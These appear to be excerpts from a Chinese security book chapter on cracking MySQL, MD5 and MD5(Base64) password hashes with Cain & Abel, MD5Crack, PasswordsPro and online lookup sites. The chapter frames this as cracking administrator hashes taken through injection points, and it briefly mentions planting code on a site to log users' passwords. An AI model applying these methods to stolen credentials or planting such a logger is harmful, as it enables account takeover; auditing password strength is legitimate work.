Cain & Abel是一个可以破解屏保口令、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令,支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码、SQL Server 7.0/2000口令解码、Remote Desktop口令解码、Access Database口令解码、Cisco PIX Firewall口令解码、Cisco MD5解码、NTLM Session Security口令解码、IKE Aggressive Mode Pre-Shared Keys口令解码、Dialup口令解码、远程桌面口令解码等的综合工具,还可以实现远程破解、挂字典及暴力破解,其Sniffer功能极其强大,几乎可以明文捕获一切账号口令,包括FTP、HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys Authentications。 |
在Cain & Abel主界面单击“Cracker”标签,然后将用户密码的加密字符串“506D1427F6F61696B4501445C90624897266DAE3”加入MySQL Hashes破解列表中,如图3-16所示。 图3-16 使用Cain破解MySQL密码 在快捷菜单中单击“Add to list”选项,将字符串复制到“Hash”输入框中,在“Username”输入框中可以输入任意内容,如图3-17所示。 图3-17 在MD5Crack4中验证MD5值 03 使用字典进行破解 如图3-18所示,选中刚才添加的需要破解的字符串,然后选择“Dictionary Attack”(字典破解)选项,在弹出的菜单中选择“MySQL SHA1 Hashes”方式进行破解。 该方式针对的是MySQL 4.1及后续版本,对于MySQL 4.1以前的版本,应选择“MySQL v3.23 Hashes”选项。 |
图3-18 选择破解方式 选择“Dictionary Attack”(字典破解)选项后,会出现一个窗口,主要用于选择字典,如图3-19所示,在“Dictionary”设置区下方单击右键,可以添加1个或者多个字典文件。 字典选择完毕后,可以在“Options”(选项)设置区中进行选择,然后单击“Start”按钮进行破解。 图3-19 设置字典破解 说明 在“Options”设置区中一共有8种方式,具体如下。 |
1.字典破解与字典强度有关 依次单击“开始”→“程序”→“MySQL”→“MySQL Server 5.0”→“MySQL Command Line Client”选项,打开“MySQL Command Line Client”窗口,输入密码后,输入以下代码设置一个新的密码。 Use MYSQL update user set password=password("1977-05-05") where user="root"; flush privileges; 本例中将原来的密码修改为“1977-05-05”,其结果如图3-21所示。 图3-21 修改MySQL用户密码 再次用UltraEdit-32打开“C:\Program Files\MySQL\MySQL Server 5.0\data\MYSQL\ user.MYD”,获取新的密码字符串“B046BBAF61FE3BB6F60CA99AF39F5C2702F00D12”,重新选择一个字典文件,本例选择生成的生日字典,如图3-22和图3-23所示,仅选择小写字符串进行破解,很快就获取了破解结果。 图3-22 再次破解MySQL密码 图3-23 修改MySQL密码后再次破解MySQL密码 2.使用彩虹表进行破解 Cain提供了彩虹表破解MySQL的方式,在破解方式中选择“Cryptanalysis Attack”→“MySQL SHA1 Hashes via RainbowTables”选项即可,如图3-24和图3-25所示。 |
图3-24 使用彩虹表破解方式 图3-25 使用彩虹表进行破解 在实际测试过程中,由于网络上提供的SHA彩虹表是RTI格式的,而Cain中使用的是RT格式的。 笔者将下载的所有彩虹表中文件后缀由“RTI”修改为“RT”,然后进行破解,提示破解不成功,其原因应该是彩虹表的格式不一样,Cain只承认它自己提供的彩虹表。 |
在主界面中单击计算机图标按钮,弹出Hash计算器,在“Text to hash”输入框中输入需要转换的原始值,如“12345678”,单击“Calculate”按钮进行计算,如图3-26所示,可以看到14种Hash值。 |
图3-26 计算Hashes值 4.生成彩虹表 在Cain的安装目录C:\Program Files\Cain\Winrtgen中直接运行Winrtgen,如图3-27所示,该工具为彩虹表生成器,可以很方便地生成各种类型的彩虹表值。 图3-27 Winrtgen彩虹表生成工具 5.设置彩虹表 单击“Add Table”按钮,在“Rainbow Table properties”对话框的“Hash”下拉列表中选择“mysqlsha1”选项,根据实际情况分别设置“Min Len”、“Max Len”、“Index”、“Chain len”、“Chain Count”及“N of tables”的值,一般情况下,仅需要设置“Min Len”、“Max Len”及“N of tables”的值。 |
“N of tables”主要用来测试Hashes生成的完整度,输入不同的值,会在“Table properties”显示区中显示百分比,使用户可以通过尝试确定一共需要生成多少个表。 |
图3-29 开始生成彩虹表 由于生成彩虹表的时间比较长,在网上也没有搜索到以“rt”结尾的MySQL Sha1 Hashes表,因此,本次破解主要以字典破解为主,彩虹表的破解将在全部生成后进行。 |
本节通过使用Cain破解MySQL密码,算是一种较好的尝试,只要使用字典工具生成一些具有一定强度的字典,对于那些设计不太复杂的MySQL密码,破解还是比较容易的。 |
未知 3.4 MD5加密与解密 本节介绍如何使用MD5Crack 3及一些在线网站进行破解。 MD5Crack 3是阿呆编写的一款MD5密码破解软件,其网站为http://www.adintr.com/subject/mdcrk/index.htm,目前已经发布了MD5Crack 4.0。 读者也可以访问笔者的博客(http://simeon.blog. 51cto.com/18680/144558)下载MD5Crack 3。 3.4.1 MD5加解密知识 MD5密文破解(解密)可以说是网络攻击中的一个必不可少的环节,是黑客工具中的一个重要辅助工具。 MD5解密主要用于网络攻击,在对网站等进行入侵的过程中,有可能获得管理员或者其他用户的账号和密码值(MD5加密后的值)。 |
如果采取了MD5加密,则可以通过MD5Crack3等软件进行破解。 由于王小云教授的MD5密码碰撞破解算法没有公布,因此目前MD5解密方式主要采取暴力破解,即软件通过算法生成字典,然后使用MD5函数加密该字典中的值形成密文,与需要破解的密文进行比较,如果相同,则认为破解成功。 目前,有很多网站提供MD5加密或者加密值查询,将加密后的MD5值输入网站,如果网站数据库中存在该MD5值,则该值对应的MD5加密前的值就是密码。 3.4.2 通过cmd5网站生成MD5密码 在浏览器地址栏中输入“http://www.cmd5.com/”,在输入框中输入想要加密的原始密码,然后单击“MD5加密或解密”按钮,如图3-30所示,原始密码为“goodman88”,加密后的密码值如下。 MD5(goodman88,32) = d5a8e0b115259023faa219f5b53ca522 MD5(goodman88,16) = 15259023faa219f5 图3-30 MD5加密 作为实验数据,我们再生成一组生日的MD5密码,示例如下。 MD5(19801230,32) = 2540bb62336a8eb3ebc1e42ee44c8e3d MD5(19801230,16) = 336a8eb3ebc1e42e 3.4.3 通过cmd5网站破解MD5密码 在cmd5网站的输入框中输入加密后的32位MD5值“d5a8e0b115259023faa219f5b53ca522”,然后单击“md5加密或解密”按钮,如图3-31所示,未能成功破解。 图3-31 通过cmd5网站未能破解MD5密码 将第2个加密后的MD5值“2540bb62336a8eb3ebc1e42ee44c8e3d”放入cmd5网站进行破解,很快其结果就出来了,如图3-32所示。 图3-32 破解简单的数字密码 3.4.4 通过在线MD5破解网站付费破解高难度的MD5密码 一些在线网站提供的MD5密码破解功能只能破解已经收录的和一些简单的密码,稍微复杂一点的密码都很难破解。 而且,对一些稍微有点难度的MD5密码值,如果数据库中存在该值,在线网站会要求访问者付费破解,如图3-33所示,提示找到但是要求付费。 图3-33 要求付费才能查看MD5密码值 3.4.5 使用字典暴力破解MD5密码值 字典暴力破解是目前最常用的MD5密码值破解方法,下面详细介绍其步骤。 |
01 再次生成MD5密码值 在cmd5网站生成原密码“jimmychu246 ”的MD5密码值,结果如下。 MD5(jimmychu246,32) = 437f4fffb6b2e5aaca9fd1712b8ad282 MD5(jimmychu246,16) = b6b2e5aaca9fd171 直接运行MD5Crack 4,界面如图3-34所示。 图3-34 MD5Crack4程序主界面 02 在MD5Crack 4中验证MD5值 将需要破解的MD5值“437f4fffb6b2e5aaca9fd1712b8ad282”粘贴到“Single Cryptograph”(破解单个密文)输入框中,如图3-35所示,如果该MD5值是正确的,则会在输入框下方显示黑色的“valid”(有效)字样,否则将显示灰色的“valid”字样。 图3-35 在MD5Crack4中验证 03 使用字典进行破解 在“Plaintext Seting”(字符设置)设置区单击选中“Dictionary”(字典)单选按钮,并在“No.1”、“No.2”及“No.3”设置框中选择3个不同的字典。 选择完毕,单击“Start”按钮,开始进行MD5破解,破解结束后会给出相应的提示,如图3-36所示。 |
图3-36 使用字典进行破解 04 使用字符集中的数字进行破解 将上面生成的MD5值“336a8eb3ebc1e42e”放入单一MD5密码破解输入框中,单击选中“Char Muster”(使用字符集)单选按钮后,可以勾选“Number”、“lowercase”、“majuscule”、“special char”及“custom”复选框进行破解。 在本例中使用数字进行破解,因此,要将“Min Length”(最小长度)的值设置为1,将“Max Length”(最大长度)的值设置为8,然后单击“Start”按钮,使用数字进行MD5破解,尝试破解密码位数为1~9999999的所有数字组合。 |
(5)在MD5Crack 4中,可以设置软件显示的语言版本,有中文简体和英语两个版本,单击主界面中的“Options”(设置)按钮即可进行设置,如图3-38所示。 |
图3-38 设置MD5Crack 4 3.4.6 一次破解多个密码 将需要破解的MD5密码全部存储到一个TXT文件中,每个密码独立占一行,然后,在MD5Crack 4中单击选中“破解多个密文”单选按钮,选择刚才编辑的MD5密码文件,如图3-39所示,选择一种破解方式,本例选择使用数字字典进行破解,最后单击“开始”按钮开始破解。 图3-39 破解多个MD5密码值 在MD5Crack 4右下方会显示破解结果,单击“日志”标签页可以查看MD5值校验等日志信息,单击“结果”标签页可以查看破解的结果。 |
图3-40 破解结果 本节介绍了使用MD5Crack及通过网站对MD5值进行破解的方法。 破解MD5值时,可以先在一些MD5破解网站进行破解,如果未能破解,则可以在本地用MD5Crack进行破解。 |
<% function jiami(str) mima="*#$A.J>?;&%*&$C#%!@#JH+-\)(HNKNDKJNKJDWNY*Y@H&A^BHJHJXNXMAX5454ADD EFW45485121WDQWD21DD5DWQ15QD1" for i=1 to len(str) newstr=newstr&Mid(str,i,1) if i>len(mima) then newstr=newstr&Mid(mima,i-len(mima),1) else newstr=newstr&Mid(mima,i,1) end if next jiami=newstr end function %> 原始密码的加密原理为:假如初始密码为“123456”,先通过jiami函数对初始密码进行长度判断,获知长度为6,依次取1位,然后插入自定义的加密字符串,加密后密码变为“1#2$3A4.5J6>”。 |
普通的6位密码通过jiami算法重新加密后,将变为12位密码,通常的MD5暴力破解基本无法破解这样的密码。 了解该加密方式后,我们就可以针对该加密方式编写一段代码,将密码字典依次间隔插入“*#$A.J>?;&%*&$C#%!@#JH+-\)(HNKNDKJNKJDWNY*Y@H&A^BHJHJXNXMAX 5454ADDEFW45485121WDQWD21DD5DWQ15QD1”字符串,然后进行密码比对,如果在加密表中找到相同的MD5值,即为破解。 |
第二个方法是在该网站插入记录用户登录密码、用户名的代码,并将每次用户登录的用户名和密码添加到指定的文件中,通过查看该文件即可获得登录密码。 |
未知 3.5 MD5(Base64)加密与解密 在对某个CMS系统进行安全检测时,可以通过注入点获取其管理员表中的管理员用户名和密码数据,但由于不知道该密码数据采用何种加密方式,所以,虽然知道CMS系统管理的后台,但苦于没有破解管理员的密码而无法登录系统。 笔者通过研究终于掌握了MD5(Base64)加密原理和解密原理,因此才有本节内容。 |
Base64是网络上最常见的用于传输8bit字节代码的编码方式之一,在发送电子邮件时,服务器认证的用户名和密码需要使用Base64编码,附件也需要使用Base64编码。 Base64要求把每3个8bit的字节转换为4个6bit的字节(3×8 = 4×6 = 24),然后把6bit再添2位高位0,组成4个8bit的字节,也就是说,转换后的字符串理论上将比原来的字符串长1/3。 |
“MD5”的全称是“Message-Digest Algorithm 5”(信息-摘要算法),在20世纪90年代初由Mit Laboratory For Computer Science和Rsa Data Security Inc的Ronald L. Rivest开发,经MD2、MD3和MD4发展而来。 |
它的作用是让大容量信息在用数字签名软件签署私人密钥前被“压缩”成一种保密的格式(就是把一个任意长度的字节串变换成一个定长的大整数)。 |
3.5.1 MD5(Base64)密码简介 MD5(Base64)加密后的字符串长度为24位,最末尾有2个“=”符号,字符串中数字和字母混写,这种加密方式在ASP.NET等CMS环境中经常碰到。 |
图3-41 MD5(Base64)密码 3.5.2 在网上寻找破解之路 直接在Google上对“md5(dbase64)加解密”进行搜索,如图3-42所示,从搜索结果来看,除了求助外,很难在网上找到MD5(dBase64)的加密和解密方法。 图3-42 Google搜索结果 3.5.3 寻求解密方法 下面我们来寻找解密MD5(Base64)密码的方法。 |
01 生成Hash值 InsidePro网站提供了在线Hash破解(http://hash.insidepro.com/)和在线生成各种Hash值的功能,在线生成Hash值的网址为http://www.insidepro.com/hashes.php?lang=eng,如图3-43所示。 |
图3-43 生成各种Hash值 02 比对Hash值和加密密码值 在生成Hash值后的http://www.insidepro.com/hashes.php?lang=eng页面上拖动滚动条,一一对照。 |
Haval128(Base64):1xehfrgfAcMYLCdLcYiDlg== Haval160(Base64):JPfaQRoHY0v/EJnXN9iKd9MfdbE= MD2(Base64):d+K74ta9Vhbr4yuKzfCAZQ== MD4(Base64):QPRz/CVV3O9EVOA/iCaOwA== MD5(Base64):Ar2S+qOKqmzA6nXlmTeh7w== “MD5(Base64):Ar2S+qOKqmzA6nXlmTeh7w==”与图3-41中的加密值一致。 如图3-44所示,验证了该加密方式就是MD5(Base64)加密。 图3-44 找到加密方式 03 添加Hash值 从http://www.insidepro.com/eng/passwordspro.shtml页面上了解到,PasswordsPro可以破解MD5(Base64)加密方式。 |
图3-46 暴力破解MD5(Base64)密码 在PasswordsPro 2.5.3.0中还有其他破解方式,包括“Preliminary Attack”、“Mask Attack”、“Simple Dictionary Attack”、“Combined Dictionary Attack”、“Hybrid Dictionary Attack”和“Rainbow Attack”6种破解方式,如图4-47所示。 |
01 进行Base64解码 网上有很多工具可以对Base64编码进行解码,其中一款是可以在Linux和Windows下运行的Base64工具,下载地址为http://www.fourmilab.ch/webtools/base64/,下载后可以直接运行,命令为“base64 -decode base64.b64 base64.tmp”,参数“-decode”或“-d”表示解码,“-encode”或“-e”表示Base64编码。 base64.b64是Base64编码后的文件,base64.tmp是解码后生成的文件。 |
图3-49 Base64解码工具 图3-50 执行解码批处理文件 02 编辑解码文件 将MD5(Base64)加密后的密码值“Ar2S+qOKqmzA6nXlmTeh7w==”复制到base64.b64文件中,编辑解码文件的情形如图3-51所示。 图3-51 编辑解码文件 03 查看解码后的文件 使用UltraEdit-32编辑器打开base64.tmp,如图3-52所示,该文件显示为乱码。 这一点笔者也很奇怪,后面通过其他一些Base64解码工具进行解码,其正常显示结果仍为乱码。 图3-52 查看解码后的文件 04 获取Base64解码后的MD5值 在UltraEdit-32编辑器中,直接以二进制方式打开解码后的文件base64.tmp,如图3-53所示,将其中的二进制编码进行整理,其结果为“02BD92FAA38AAA6CC0EA 75E59937A1EF”,共32位,这与MD5加密后的值有些相似。 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.